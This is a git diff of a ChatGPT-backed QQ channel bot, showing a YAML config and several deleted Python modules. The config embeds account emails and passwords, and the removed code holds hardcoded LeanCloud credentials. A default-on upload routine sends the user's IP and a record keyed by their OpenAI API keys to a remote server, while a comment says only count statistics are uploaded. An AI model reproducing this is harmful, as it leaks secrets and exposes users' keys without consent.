||||
|
||||
# OpenAI官方API
|
||||
# 注意:已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - sk-xxxxxx
|
||||
# - sk-xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
# 关于api_base:可以使用一些云函数(如腾讯、阿里)来避免国内被墙的问题。
|
||||
# 详见:
|
||||
# https://github.com/Ice-Hazymoon/openai-scf-proxy
|
||||
# https://github.com/Soulter/QQChannelChatGPT/issues/42
|
||||
# 设置为none则表示使用官方默认api地址
|
||||
openai:
|
||||
key:
|
||||
-
|
||||
api_base: none
|
||||
# 这里是GPT配置,语言模型默认使用gpt-3.5-turbo
|
||||
chatGPTConfigs:
|
||||
model: gpt-3.5-turbo
|
||||
max_tokens: 3000
|
||||
temperature: 0.9
|
||||
top_p: 1
|
||||
frequency_penalty: 0
|
||||
presence_penalty: 0
|
||||
|
||||
total_tokens_limit: 5000
|
||||
|
||||
# 逆向文心一言【暂时不可用,请勿使用】
|
||||
rev_ernie:
|
||||
enable: false
|
||||
|
||||
# 逆向New Bing
|
||||
# 需要在项目根目录下创建cookies.json并粘贴cookies进去。
|
||||
# 详见:https://soulter.top/posts/qpdg.html
|
||||
rev_edgegpt:
|
||||
enable: false
|
||||
|
||||
# 逆向ChatGPT库
|
||||
# https://github.com/acheong08/ChatGPT
|
||||
@@ -63,14 +124,14 @@ direct_message_mode: true
|
||||
# - email: 第2个账户
|
||||
# password: 第2个账户密码
|
||||
# - ....
|
||||
# 支持使用access_token登录
|
||||
# 例:
|
||||
# - session_token: xxxxx
|
||||
# - access_token: xxxx
|
||||
# 请严格按照上面这个格式填写。
|
||||
# 这里我免费提供2个账号给大家,不过用的人一定会很多的,所以会造成一些bug,因此还是用自己的账号好一点。
|
||||
# 需要账号可以联系我。QQ905617992
|
||||
|
||||
# 逆向ChatGPT库的email-password登录方式不工作,建议使用access_token登录
|
||||
# 获取access_token的方法,详见:https://soulter.top/posts/qpdg.html
|
||||
rev_ChatGPT:
|
||||
enable: false
|
||||
account:
|
||||
- email: d.o.m.her.ry61.7@gmail.com
|
||||
password: 11111111
|
||||
- email: ca.it.li.nal.o.i.si.o91@gmail.com
|
||||
password: 11111111
|
||||
- access_token:
|
||||
@@ -1,86 +0,0 @@
|
||||
import sqlite3
|
||||
import yaml
|
||||
|
||||
# TODO: 数据库缓存prompt
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
# 读取参数,并支持中文
|
||||
conn = sqlite3.connect("data.db")
|
||||
conn.text_factory=str
|
||||
self.conn = conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
)
|
||||
'''
|
||||
)
|
||||
|
||||
conn.commit()
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
|
||||
@@ -1,172 +0,0 @@
|
||||
import openai
|
||||
import yaml
|
||||
from util.errors.errors import PromptExceededError
|
||||
import json
|
||||
import time
|
||||
import os
|
||||
import sys
|
||||
|
||||
inst = None
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
key_record_path = abs_path+'chatgpt_key_record'
|
||||
|
||||
class ChatGPT:
|
||||
def __init__(self, cfg):
|
||||
self.key_list = []
|
||||
if cfg['key'] != '' or cfg['key'] != '修改我!!':
|
||||
print("[System] 读取ChatGPT Key成功")
|
||||
self.key_list = cfg['key']
|
||||
# openai.api_key = cfg['key']
|
||||
else:
|
||||
input("[System] 请先去完善ChatGPT的Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
|
||||
# init key record
|
||||
self.init_key_record()
|
||||
|
||||
chatGPT_configs = cfg['chatGPTConfigs']
|
||||
print(f'[System] 加载ChatGPTConfigs: {chatGPT_configs}')
|
||||
self.chatGPT_configs = chatGPT_configs
|
||||
self.openai_configs = cfg
|
||||
|
||||
def chat(self, prompt, image_mode = False):
|
||||
# ChatGPT API 2023/3/2
|
||||
messages = [{"role": "user", "content": prompt}]
|
||||
try:
|
||||
if not image_mode:
|
||||
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e) or 'Billing hard limit has been reached' in str(e) or 'No API key provided.' in str(e):
|
||||
print("[System] 当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
|
||||
response, is_switched = self.handle_switch_key(prompt)
|
||||
if not is_switched:
|
||||
# 所有Key都超额
|
||||
raise e
|
||||
else:
|
||||
if not image_mode:
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
if not image_mode:
|
||||
self.key_stat[openai.api_key]['used'] += response['usage']['total_tokens']
|
||||
self.save_key_record()
|
||||
print("[ChatGPT] "+str(response["choices"][0]["message"]["content"]))
|
||||
return str(response["choices"][0]["message"]["content"]).strip(), response['usage']['total_tokens']
|
||||
else:
|
||||
return response['data'][0]['url']
|
||||
|
||||
    def handle_switch_key(self, prompt):
        messages = [{"role": "user", "content": prompt}]
        while True:
            is_all_exceed = True
            for key in self.key_stat:
                if not self.key_stat[key]['exceed']:
                    is_all_exceed = False
                    openai.api_key = key
                    print(f"[System] 切换到Key: {key}, 已使用token: {self.key_stat[key]['used']}")
                    if prompt != '':
                        try:
                            response = openai.ChatCompletion.create(
                                messages=messages,
                                **self.chatGPT_configs
                            )
                            return response, True
                        except Exception as e:
                            print(e)
                            if 'You exceeded' in str(e):
                                print("[System] 当前Key已超额,正在切换")
                                self.key_stat[openai.api_key]['exceed'] = True
                                self.save_key_record()
                                time.sleep(1)
                                continue
                    else:
                        # no prompt given: a usable key has been selected, so report
                        # success with the same (response, switched) shape as above
                        return None, True
            if is_all_exceed:
                print("[System] 所有Key已超额")
                return None, False

def getConfigs(self):
|
||||
return self.openai_configs
|
||||
|
||||
def save_key_record(self):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump(self.key_stat, f)
|
||||
|
||||
def get_key_stat(self):
|
||||
return self.key_stat
|
||||
def get_key_list(self):
|
||||
return self.key_list
|
||||
|
||||
# 添加key
|
||||
def append_key(self, key, sponsor):
|
||||
self.key_list.append(key)
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0, 'sponsor': sponsor}
|
||||
self.save_key_record()
|
||||
self.init_key_record()
|
||||
# 检查key是否可用
|
||||
def check_key(self, key):
|
||||
pre_key = openai.api_key
|
||||
openai.api_key = key
|
||||
messages = [{"role": "user", "content": "1"}]
|
||||
try:
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
openai.api_key = pre_key
|
||||
return True
|
||||
except Exception as e:
|
||||
pass
|
||||
openai.api_key = pre_key
|
||||
return False
|
||||
|
||||
#将key_list的key转储到key_record中,并记录相关数据
|
||||
def init_key_record(self):
|
||||
if not os.path.exists(key_record_path):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
with open(key_record_path, 'r', encoding='utf-8') as keyfile:
|
||||
try:
|
||||
self.key_stat = json.load(keyfile)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
self.key_stat = {}
|
||||
finally:
|
||||
for key in self.key_list:
|
||||
if key not in self.key_stat:
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0}
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
else:
|
||||
# if self.key_stat[key]['exceed']:
|
||||
# print(f"Key: {key} 已超额")
|
||||
# continue
|
||||
# else:
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
# print(f"使用Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
pass
|
||||
if openai.api_key is None:
|
||||
self.handle_switch_key("")
|
||||
self.save_key_record()
|
||||
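The deleted core above rotates across multiple API keys: a key that raises a quota error is flagged in key_stat, persisted via save_key_record(), and the next unflagged key is tried; only when every key is flagged does it give up. A hedged, self-contained sketch of that rotation loop; `call_api` and the key names below are stand-ins for illustration, not the project's API:

```python
# Illustrative sketch of the key-rotation idea in handle_switch_key():
# skip keys marked 'exceed', try the next one, mark it on quota errors,
# and report failure only when every key has been marked.
def pick_key_and_call(key_stat: dict, call_api):
    while True:
        available = [k for k, s in key_stat.items() if not s['exceed']]
        if not available:
            return None, False              # all keys exhausted
        key = available[0]
        try:
            return call_api(key), True      # switched successfully
        except Exception as e:
            if 'You exceeded' in str(e):
                key_stat[key]['exceed'] = True   # mark and move on to the next key
                continue
            raise

# usage with a fake API whose first key is over quota:
stats = {'sk-aaa': {'exceed': False, 'used': 0}, 'sk-bbb': {'exceed': False, 'used': 0}}
def fake_api(key):
    if key == 'sk-aaa':
        raise RuntimeError('You exceeded your current quota')
    return f'ok via {key}'

print(pick_key_and_call(stats, fake_api))   # ('ok via sk-bbb', True)
```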
@@ -1,768 +0,0 @@
|
||||
import botpy
|
||||
from botpy.message import Message
|
||||
import yaml
|
||||
import re
|
||||
from util.errors.errors import PromptExceededError
|
||||
from botpy.message import DirectMessage
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import time
|
||||
from cores.database.conn import dbConn
|
||||
import requests
|
||||
import util.unfit_words as uw
|
||||
import os
|
||||
import sys
|
||||
from cores.qqbot.personality import personalities
|
||||
|
||||
|
||||
history_dump_interval = 10
|
||||
# QQBotClient实例
|
||||
client = ''
|
||||
# ChatGPT实例
|
||||
global chatgpt
|
||||
# 缓存的会话
|
||||
session_dict = {}
|
||||
# 最大缓存token(在配置里改 configs/config.yaml)
|
||||
max_tokens = 2000
|
||||
# 配置信息
|
||||
config = {}
|
||||
# 统计信息
|
||||
count = {}
|
||||
# 统计信息
|
||||
stat_file = ''
|
||||
# 是否独立会话默认值
|
||||
uniqueSession = False
|
||||
|
||||
# 日志记录
|
||||
logf = open('log.log', 'a+', encoding='utf-8')
|
||||
# 是否上传日志,仅上传频道数量等数量的统计信息
|
||||
is_upload_log = True
|
||||
|
||||
# 用户发言频率
|
||||
user_frequency = {}
|
||||
# 时间默认值
|
||||
frequency_time = 60
|
||||
# 计数默认值
|
||||
frequency_count = 2
|
||||
|
||||
# 公告(可自定义):
|
||||
announcement = ""
|
||||
|
||||
# 人格信息
|
||||
now_personality = {}
|
||||
|
||||
# 机器人私聊模式
|
||||
direct_message_mode = True
|
||||
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
# 版本
|
||||
version = '2.4 RealChatGPT Ver.'
|
||||
|
||||
# 语言模型提供商
|
||||
REV_CHATGPT = 'rev_chatgpt'
|
||||
OPENAI_OFFICIAL = 'openai_official'
|
||||
provider = ''
|
||||
|
||||
# 逆向库对象及负载均衡
|
||||
rev_chatgpt = []
|
||||
|
||||
# gpt配置信息
|
||||
gpt_config = {}
|
||||
|
||||
def new_sub_thread(func, args=()):
|
||||
thread = threading.Thread(target=func, args=args, daemon=True)
|
||||
thread.start()
|
||||
|
||||
class botClient(botpy.Client):
|
||||
# 收到At消息
|
||||
async def on_at_message_create(self, message: Message):
|
||||
toggle_count(at=True, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
new_sub_thread(oper_msg, (message, True))
|
||||
# await oper_msg(message=message, at=True)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: DirectMessage):
|
||||
if direct_message_mode:
|
||||
toggle_count(at=False, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
# await oper_msg(message=message, at=False)
|
||||
new_sub_thread(oper_msg, (message, False))
|
||||
|
||||
# 写入统计信息
|
||||
def toggle_count(at: bool, message):
|
||||
global stat_file
|
||||
try:
|
||||
if str(message.guild_id) not in count:
|
||||
count[str(message.guild_id)] = {
|
||||
'count': 1,
|
||||
'direct_count': 1,
|
||||
}
|
||||
else:
|
||||
count[str(message.guild_id)]['count'] += 1
|
||||
if not at:
|
||||
count[str(message.guild_id)]['direct_count'] += 1
|
||||
stat_file = open(abs_path+"configs/stat", 'w', encoding='utf-8')
|
||||
stat_file.write(json.dumps(count))
|
||||
stat_file.flush()
|
||||
stat_file.close()
|
||||
except BaseException:
|
||||
pass
|
||||
|
||||
# 转储历史记录的定时器~ Soulter
|
||||
def dump_history():
|
||||
time.sleep(10)
|
||||
global session_dict, history_dump_interval
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
# print("转储历史记录...")
|
||||
for key in session_dict:
|
||||
# print("TEST: "+str(db.get_session(key)))
|
||||
data = session_dict[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
# print("转储历史记录完毕")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
# 每隔10分钟转储一次
|
||||
time.sleep(10*history_dump_interval)
|
||||
|
||||
# 上传统计信息并检查更新
|
||||
def upload():
|
||||
global object_id
|
||||
global version
|
||||
while True:
|
||||
addr = ''
|
||||
try:
|
||||
# 用户唯一性标识
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
d = {"data": {"guild_count": guild_count, "guild_msg_count": guild_msg_count, "guild_direct_msg_count": guild_direct_msg_count, "session_count": session_count, 'addr': addr, 'winver': version, 'key_stat':key_stat}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
print("[System] New User.")
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open(abs_path+"configs/object_id", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
except BaseException as e:
|
||||
pass
|
||||
# 每隔2小时上传一次
|
||||
time.sleep(60*60*2)
|
||||
|
||||
'''
|
||||
初始化机器人
|
||||
'''
|
||||
def initBot(cfg, prov):
|
||||
global chatgpt, provider, rev_chatgpt
|
||||
global now_personality, gpt_config, config, uniqueSession, history_dump_interval, frequency_count, frequency_time,announcement, direct_message_mode, version
|
||||
|
||||
provider = prov
|
||||
config = cfg
|
||||
|
||||
# 语言模型提供商
|
||||
if prov == REV_CHATGPT:
|
||||
if 'account' in cfg['rev_ChatGPT']:
|
||||
from addons.revChatGPT.revchatgpt import revChatGPT
|
||||
for i in range(0, len(cfg['rev_ChatGPT']['account'])):
|
||||
print(f"[System] 正在创建rev_ChatGPT负载{str(i)}: " + cfg['rev_ChatGPT']['account'][i]['email'])
|
||||
revstat = {
|
||||
'obj': revChatGPT(cfg['rev_ChatGPT']['account'][i]),
|
||||
'busy': False
|
||||
}
|
||||
rev_chatgpt.append(revstat)
|
||||
else:
|
||||
input("[System-err] 请退出本程序, 然后在配置文件中填写rev_ChatGPT的email和password")
|
||||
elif prov == OPENAI_OFFICIAL:
|
||||
from cores.openai.core import ChatGPT
|
||||
chatgpt = ChatGPT(cfg['openai'])
|
||||
global max_tokens
|
||||
max_tokens = int(chatgpt.getConfigs()['total_tokens_limit'])
|
||||
|
||||
# 读取历史记录 Soulter
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
session_dict[session[0]] = json.loads(session[1])['data']
|
||||
print("[System] 历史记录读取成功喵")
|
||||
except BaseException as e:
|
||||
print("[System] 历史记录读取失败: " + str(e))
|
||||
|
||||
# 读统计信息
|
||||
global stat_file
|
||||
if not os.path.exists(abs_path+"configs/stat"):
|
||||
with open(abs_path+"configs/stat", 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
stat_file = open(abs_path+"configs/stat", 'r', encoding='utf-8')
|
||||
global count
|
||||
res = stat_file.read()
|
||||
if res == '':
|
||||
count = {}
|
||||
else:
|
||||
try:
|
||||
count = json.loads(res)
|
||||
except BaseException:
|
||||
pass
|
||||
# 创建转储定时器线程
|
||||
threading.Thread(target=dump_history, daemon=True).start()
|
||||
|
||||
# 得到GPT配置信息
|
||||
if 'openai' in cfg and 'chatGPTConfigs' in cfg['openai']:
|
||||
gpt_config = cfg['openai']['chatGPTConfigs']
|
||||
|
||||
# 统计上传
|
||||
if is_upload_log:
|
||||
# 读取object_id
|
||||
global object_id
|
||||
if not os.path.exists(abs_path+"configs/object_id"):
|
||||
with open(abs_path+"configs/object_id", 'w', encoding='utf-8') as f:
|
||||
f.write("")
|
||||
object_id_file = open(abs_path+"configs/object_id", 'r', encoding='utf-8')
|
||||
object_id = object_id_file.read()
|
||||
object_id_file.close()
|
||||
# 创建上传定时器线程
|
||||
threading.Thread(target=upload, daemon=True).start()
|
||||
|
||||
# 得到私聊模式配置
|
||||
if 'direct_message_mode' in cfg:
|
||||
direct_message_mode = cfg['direct_message_mode']
|
||||
print("[System] 私聊功能: "+str(direct_message_mode))
|
||||
|
||||
# 得到版本
|
||||
if 'version' in cfg:
|
||||
version = cfg['version']
|
||||
print("[System] QQChannelChatGPT版本: "+str(version))
|
||||
|
||||
# 得到发言频率配置
|
||||
if 'limit' in cfg:
|
||||
print('[System] 发言频率配置: '+str(cfg['limit']))
|
||||
if 'count' in cfg['limit']:
|
||||
frequency_count = cfg['limit']['count']
|
||||
if 'time' in cfg['limit']:
|
||||
frequency_time = cfg['limit']['time']
|
||||
|
||||
announcement += '[QQChannelChatGPT项目]\n所有回答与腾讯公司无关。出现问题请前往[GPT机器人]官方频道\n\n'
|
||||
# 得到公告配置
|
||||
if 'notice' in cfg:
|
||||
print('[System] 公告配置: '+cfg['notice'])
|
||||
announcement += cfg['notice']
|
||||
try:
|
||||
if 'uniqueSessionMode' in cfg and cfg['uniqueSessionMode']:
|
||||
uniqueSession = True
|
||||
else:
|
||||
uniqueSession = False
|
||||
print("[System] 独立会话: " + str(uniqueSession))
|
||||
if 'dump_history_interval' in cfg:
|
||||
history_dump_interval = int(cfg['dump_history_interval'])
|
||||
print("[System] 历史记录转储时间周期: " + str(history_dump_interval) + "分钟")
|
||||
except BaseException:
|
||||
print("[System-Error] 读取uniqueSessionMode/version/dump_history_interval配置文件失败, 使用默认值。")
|
||||
|
||||
print(f"[System] QQ开放平台AppID: {cfg['qqbot']['appid']} 令牌: {cfg['qqbot']['token']}")
|
||||
|
||||
print("\n[System] 如果有任何问题,请在https://github.com/Soulter/QQChannelChatGPT上提交issue说明问题!或者添加QQ:905617992")
|
||||
print("[System] 请给https://github.com/Soulter/QQChannelChatGPT点个star!")
|
||||
print("[System] 请给https://github.com/Soulter/QQChannelChatGPT点个star!")
|
||||
input("\n仔细阅读完以上信息后,输入任意信息并回车以继续")
|
||||
try:
|
||||
run_bot(cfg['qqbot']['appid'], cfg['qqbot']['token'])
|
||||
except BaseException as e:
|
||||
input(f"\n[System-Error] 启动QQ机器人时出现错误,原因如下:{e}\n可能是没有填写QQBOT appid和token?请在config中完善你的appid和token\n配置教程:https://soulter.top/posts/qpdg.html\n")
|
||||
|
||||
|
||||
'''
|
||||
启动机器人
|
||||
'''
|
||||
def run_bot(appid, token):
|
||||
intents = botpy.Intents(public_guild_messages=True, direct_message=True)
|
||||
global client
|
||||
client = botClient(intents=intents)
|
||||
client.run(appid=appid, token=token)
|
||||
|
||||
'''
|
||||
得到OpenAI官方API的回复
|
||||
'''
|
||||
def get_chatGPT_response(prompts_str, image_mode=False):
|
||||
res = ''
|
||||
usage = ''
|
||||
if not image_mode:
|
||||
res, usage = chatgpt.chat(prompts_str)
|
||||
# 处理结果文本
|
||||
chatgpt_res = res.strip()
|
||||
return res, usage
|
||||
else:
|
||||
res = chatgpt.chat(prompts_str, image_mode = True)
|
||||
return res
|
||||
|
||||
'''
|
||||
负载均衡,得到逆向ChatGPT回复
|
||||
'''
|
||||
def get_rev_ChatGPT_response(prompts_str):
|
||||
res = ''
|
||||
print("[Debug] "+str(rev_chatgpt))
|
||||
for revstat in rev_chatgpt:
|
||||
if not revstat['busy']:
|
||||
revstat['busy'] = True
|
||||
print("[Debug] 使用逆向ChatGPT回复ing", end='')
|
||||
res = revstat['obj'].chat(prompts_str)
|
||||
print("OK")
|
||||
revstat['busy'] = False
|
||||
# 处理结果文本
|
||||
chatgpt_res = res.strip()
|
||||
return res
|
||||
res = '所有的OpenAI账号都有负载, 请稍后再试~'
|
||||
return res
|
||||
|
||||
|
||||
'''
|
||||
回复QQ消息
|
||||
'''
|
||||
def send_qq_msg(message, res, image_mode=False):
|
||||
if not image_mode:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(content=res), client.loop)
|
||||
except:
|
||||
raise
|
||||
else:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(image=res, content=""), client.loop)
|
||||
|
||||
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
def get_prompts_by_cache_list(cache_data_list, divide=False, paging=False, size=5, page=1):
|
||||
prompts = ""
|
||||
if paging:
|
||||
page_begin = (page-1)*size
|
||||
page_end = page*size
|
||||
if page_begin < 0:
|
||||
page_begin = 0
|
||||
if page_end > len(cache_data_list):
|
||||
page_end = len(cache_data_list)
|
||||
cache_data_list = cache_data_list[page_begin:page_end]
|
||||
for item in cache_data_list:
|
||||
prompts += str(item['prompt'])
|
||||
if divide:
|
||||
prompts += "----------\n"
|
||||
return prompts
|
||||
|
||||
def get_user_usage_tokens(cache_list):
|
||||
usage_tokens = 0
|
||||
for item in cache_list:
|
||||
usage_tokens += int(item['single_tokens'])
|
||||
return usage_tokens
|
||||
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
def check_frequency(id) -> bool:
|
||||
ts = int(time.time())
|
||||
if id in user_frequency:
|
||||
if ts-user_frequency[id]['time'] > frequency_time:
|
||||
user_frequency[id]['time'] = ts
|
||||
user_frequency[id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if user_frequency[id]['count'] >= frequency_count:
|
||||
return False
|
||||
else:
|
||||
user_frequency[id]['count']+=1
|
||||
return True
|
||||
else:
|
||||
t = {'time':ts,'count':1}
|
||||
user_frequency[id] = t
|
||||
return True
|
||||
|
||||
'''
|
||||
处理消息
|
||||
'''
|
||||
def oper_msg(message, at=False, loop=None):
|
||||
global session_dict, provider
|
||||
print("[QQBOT] 接收到消息:"+ str(message.content))
|
||||
qq_msg = ''
|
||||
session_id = ''
|
||||
name = ''
|
||||
user_id = message.author.id
|
||||
user_name = message.author.username
|
||||
|
||||
# 检查发言频率
|
||||
if not check_frequency(user_id):
|
||||
send_qq_msg(message, f'{user_name}的发言超过频率限制(╯▔皿▔)╯。\n{frequency_time}秒内只能提问{frequency_count}次。')
|
||||
return
|
||||
|
||||
logf.write("[QQBOT] "+ str(message.content)+'\n')
|
||||
logf.flush()
|
||||
|
||||
if at:
|
||||
qq_msg = message.content
|
||||
lines = qq_msg.splitlines()
|
||||
for i in range(len(lines)):
|
||||
lines[i] = re.sub(r"<@!\d+>", "", lines[i])
|
||||
qq_msg = "\n".join(lines).lstrip().strip()
|
||||
|
||||
if uniqueSession:
|
||||
session_id = user_id
|
||||
else:
|
||||
session_id = message.channel_id
|
||||
else:
|
||||
qq_msg = message.content
|
||||
session_id = user_id
|
||||
|
||||
if uniqueSession:
|
||||
name = user_name
|
||||
else:
|
||||
name = "频道"
|
||||
|
||||
command_type = -1
|
||||
# 特殊指令
|
||||
if qq_msg == "/继续":
|
||||
qq_msg = "继续"
|
||||
# 普通指令
|
||||
else:
|
||||
# 如果第一个字符是/,则为指令
|
||||
if qq_msg[0] == "/":
|
||||
res, go, command_type = command_oper(qq_msg, message, session_id, name, user_id, user_name, at)
|
||||
send_qq_msg(message, res)
|
||||
if not go:
|
||||
return
|
||||
if command_type == 1 and 'prompt' in now_personality:
|
||||
# 设置人格
|
||||
qq_msg = now_personality['prompt']
|
||||
|
||||
# 这里是预设,你可以按需更改
|
||||
if qq_msg.strip() == 'hello' or qq_msg.strip() == '你好' or qq_msg.strip() == '':
|
||||
send_qq_msg(message, f"你好呀~")
|
||||
return
|
||||
# if qq_msg.strip() == '傻逼' or qq_msg.strip() == 'sb':
|
||||
# send_qq_msg(message, f"好好好")
|
||||
# return
|
||||
# if '喜多' in qq_msg:
|
||||
# send_qq_msg(message, 'http://rn2ztkeap.hn-bkt.clouddn.com/xd1.gif', True)
|
||||
# if '台湾' in qq_msg or 'taiwan' in qq_msg:
|
||||
# send_qq_msg(message, "声明:台湾是中国的一部分。\n下面否定此结论的回答全部无效。")
|
||||
|
||||
# 关键词拦截器
|
||||
for i in uw.unfit_words_q:
|
||||
if i in qq_msg.strip():
|
||||
send_qq_msg(message, f"你的提问中有不太合适的内容😭\n请更换措辞~")
|
||||
return
|
||||
|
||||
# 会话机制
|
||||
if session_id not in session_dict:
|
||||
session_dict[session_id] = []
|
||||
|
||||
fjson = {}
|
||||
try:
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
fjson[session_id] = 'true'
|
||||
f = open(abs_path+"configs/session", "w", encoding="utf-8")
|
||||
f.write(json.dumps(fjson))
|
||||
f.flush()
|
||||
f.close()
|
||||
|
||||
chatgpt_res = "[Error] 占位符"
|
||||
if provider == OPENAI_OFFICIAL:
|
||||
|
||||
# 获取缓存
|
||||
cache_prompt = ''
|
||||
cache_data_list = session_dict[session_id]
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
cache_prompt += "\nHuman: "+ qq_msg + "\nAI: "
|
||||
|
||||
# 请求chatGPT获得结果
|
||||
try:
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
except (BaseException) as e:
|
||||
print("[System-Err] OpenAI API错误。原因如下:\n"+str(e))
|
||||
if 'maximum context length' in str(e):
|
||||
print("token超限, 清空对应缓存")
|
||||
session_dict[session_id] = []
|
||||
cache_data_list = []
|
||||
cache_prompt = "Human: "+ qq_msg + "\nAI: "
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
elif 'exceeded' in str(e):
|
||||
send_qq_msg(message, f"OpenAI API错误。原因:\n{str(e)} \n超额了。可自己搭建一个机器人(Github仓库:QQChannelChatGPT)")
|
||||
else:
|
||||
send_qq_msg(message, f"OpenAI API错误。原因如下:\n{str(e)} \n前往官方频道反馈~")
|
||||
return
|
||||
|
||||
# 超过指定tokens, 尽可能的保留最多的条目,直到小于max_tokens
|
||||
if current_usage_tokens > max_tokens:
|
||||
t = current_usage_tokens
|
||||
index = 0
|
||||
while t > max_tokens:
|
||||
if index >= len(cache_data_list):
|
||||
break
|
||||
if 'level' in cache_data_list[index] and cache_data_list[index]['level'] != 'max':
|
||||
t -= int(cache_data_list[index]['single_tokens'])
|
||||
del cache_data_list[index]
|
||||
else:
|
||||
index += 1
|
||||
# 删除完后更新相关字段
|
||||
session_dict[session_id] = cache_data_list
|
||||
